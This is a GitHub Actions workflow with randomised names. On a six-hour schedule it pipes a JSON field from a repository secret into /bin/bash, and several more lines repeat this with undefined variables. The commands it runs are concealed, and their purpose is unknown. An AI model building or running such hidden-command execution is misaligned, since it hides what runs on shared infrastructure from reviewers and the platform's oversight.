name: midayuan3810

on:
  workflow_dispatch:
  schedule:
    - cron: '48 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: midayuan3810
        env:
          ob18: ${{ secrets.ob18 }}
        run: |
          echo $ob18 | jq -r .dmt09 | /bin/bash
          echo $qtbz3587 | jq -r .txkl790 | /bin/bash
          echo $i537 | jq -r .d839 | /bin/bash
          echo $j34 | jq -r .yo71972 | /bin/bash
          echo $iiv7647 | jq -r .qolik76730 | /bin/bash
          echo $lkgkt1 | jq -r .bhypr56 | /bin/bash
          echo $gk9214 | jq -r .rtvkd5 | /bin/bash

